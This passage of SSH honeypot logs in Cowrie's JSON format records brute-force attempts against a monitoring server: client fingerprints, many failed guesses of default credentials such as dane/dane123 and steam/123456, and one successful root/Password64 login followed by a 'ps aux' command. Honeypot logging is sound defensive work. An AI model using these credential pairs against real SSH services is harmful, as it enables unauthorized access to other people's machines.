openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:45:28.432998Z","src_ip":"199.195.248.191","session":"eb6676e2c452"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:28.963326Z","src_ip":"199.195.248.191","session":"eb6676e2c452"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:30.117500Z","src_ip":"199.195.248.191","session":"eb6676e2c452"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43648,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7b02837a3f2","protocol":"ssh","message":"New connection: 217.154.1.158:43648 (1.2.3.4:22) [session: a7b02837a3f2]","sensor":"my-vps","timestamp":"2025-08-26T19:45:40.927632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:45:40.928521Z","src_ip":"217.154.1.158","session":"a7b02837a3f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:45:40.942724Z","src_ip":"217.154.1.158","session":"a7b02837a3f2"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:40.987166Z","src_ip":"217.154.1.158","session":"a7b02837a3f2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:42.004036Z","src_ip":"217.154.1.158","session":"a7b02837a3f2"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":24311,"dst_ip":"1.2.3.4","dst_port":22,"session":"8911036d3efb","protocol":"ssh","message":"New connection: 213.108.243.7:24311 (1.2.3.4:22) [session: 8911036d3efb]","sensor":"my-vps","timestamp":"2025-08-26T19:45:49.225028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:45:49.233960Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:45:49.344028Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.login.success","username":"root","password":"Password64","message":"login attempt [root/Password64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:45:49.769403Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:45:50.001951Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-26T19:45:50.002927Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:50.109423Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:50.110853Z","src_ip":"213.108.243.7","session":"8911036d3efb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63250,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a2977b1042c","protocol":"ssh","message":"New connection: 212.227.235.229:63250 (1.2.3.4:22) [session: 2a2977b1042c]","sensor":"my-vps","timestamp":"2025-08-26T19:45:51.468448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:45:51.469330Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:45:52.189261Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane","message":"login attempt [dane/dane] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:52.895741Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1","message":"login attempt [dane/dane1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:54.553573Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane123","message":"login attempt [dane/dane123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:55.708287Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane1234","message":"login attempt [dane/dane1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:56.846826Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58862,"dst_ip":"1.2.3.4","dst_port":22,"session":"727657e45886","protocol":"ssh","message":"New connection: 217.72.205.35:58862 (1.2.3.4:22) [session: 727657e45886]","sensor":"my-vps","timestamp":"2025-08-26T19:45:57.889663Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:57.890742Z","src_ip":"217.72.205.35","session":"727657e45886"}
{"eventid":"cowrie.login.failed","username":"dane","password":"dane12345","message":"login attempt [dane/dane12345] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:57.986097Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51158,"dst_ip":"1.2.3.4","dst_port":22,"session":"a16c91e486c6","protocol":"ssh","message":"New connection: 217.154.1.158:51158 (1.2.3.4:22) [session: a16c91e486c6]","sensor":"my-vps","timestamp":"2025-08-26T19:45:58.361738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:45:58.363442Z","src_ip":"217.154.1.158","session":"a16c91e486c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:45:58.377685Z","src_ip":"217.154.1.158","session":"a16c91e486c6"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-26T19:45:58.433424Z","src_ip":"217.154.1.158","session":"a16c91e486c6"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:59.153399Z","src_ip":"212.227.235.229","session":"2a2977b1042c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:45:59.450577Z","src_ip":"217.154.1.158","session":"a16c91e486c6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55188,"dst_ip":"1.2.3.4","dst_port":22,"session":"868a40b7a204","protocol":"ssh","message":"New connection: 217.154.1.158:55188 (1.2.3.4:22) [session: 868a40b7a204]","sensor":"my-vps","timestamp":"2025-08-26T19:46:15.881920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:46:15.883049Z","src_ip":"217.154.1.158","session":"868a40b7a204"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:46:15.897856Z","src_ip":"217.154.1.158","session":"868a40b7a204"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-26T19:46:15.942280Z","src_ip":"217.154.1.158","session":"868a40b7a204"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:46:16.958313Z","src_ip":"217.154.1.158","session":"868a40b7a204"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":34982,"dst_ip":"1.2.3.4","dst_port":22,"session":"16ba3d645939","protocol":"ssh","message":"New connection: 199.195.248.191:34982 (1.2.3.4:22) [session: 16ba3d645939]","sensor":"my-vps","timestamp":"2025-08-26T19:46:28.991328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:46:29.005629Z","src_ip":"199.195.248.191","session":"16ba3d645939"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:46:29.090924Z","src_ip":"199.195.248.191","session":"16ba3d645939"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123mudar","message":"login attempt [deploy/123mudar] failed","sensor":"my-vps","timestamp":"2025-08-26T19:46:29.445211Z","src_ip":"199.195.248.191","session":"16ba3d645939"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:46:30.535556Z","src_ip":"199.195.248.191","session":"16ba3d645939"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56870,"dst_ip":"1.2.3.4","dst_port":22,"session":"769dbfe8189d","protocol":"ssh","message":"New connection: 217.154.1.158:56870 (1.2.3.4:22) [session: 769dbfe8189d]","sensor":"my-vps","timestamp":"2025-08-26T19:46:33.399522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:46:33.400253Z","src_ip":"217.154.1.158","session":"769dbfe8189d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:46:33.414806Z","src_ip":"217.154.1.158","session":"769dbfe8189d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-26T19:46:33.458900Z","src_ip":"217.154.1.158","session":"769dbfe8189d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:46:34.475404Z","src_ip":"217.154.1.158","session":"769dbfe8189d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51434,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b7d7d9a2d6","protocol":"ssh","message":"New connection: 217.154.1.158:51434 (1.2.3.4:22) [session: 58b7d7d9a2d6]","sensor":"my-vps","timestamp":"2025-08-26T19:46:50.888319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:46:50.889498Z","src_ip":"217.154.1.158","session":"58b7d7d9a2d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:46:50.916118Z","src_ip":"217.154.1.158","session":"58b7d7d9a2d6"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:46:50.964849Z","src_ip":"217.154.1.158","session":"58b7d7d9a2d6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:46:51.980817Z","src_ip":"217.154.1.158","session":"58b7d7d9a2d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42510,"dst_ip":"1.2.3.4","dst_port":22,"session":"84b86eaf6d01","protocol":"ssh","message":"New connection: 212.227.125.160:42510 (1.2.3.4:22) [session: 84b86eaf6d01]","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.397555Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.398728Z","src_ip":"212.227.125.160","session":"84b86eaf6d01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42801,"dst_ip":"1.2.3.4","dst_port":22,"session":"cedd8aefcbef","protocol":"ssh","message":"New connection: 212.227.125.160:42801 (1.2.3.4:22) [session: cedd8aefcbef]","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.508657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.509527Z","src_ip":"212.227.125.160","session":"cedd8aefcbef"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 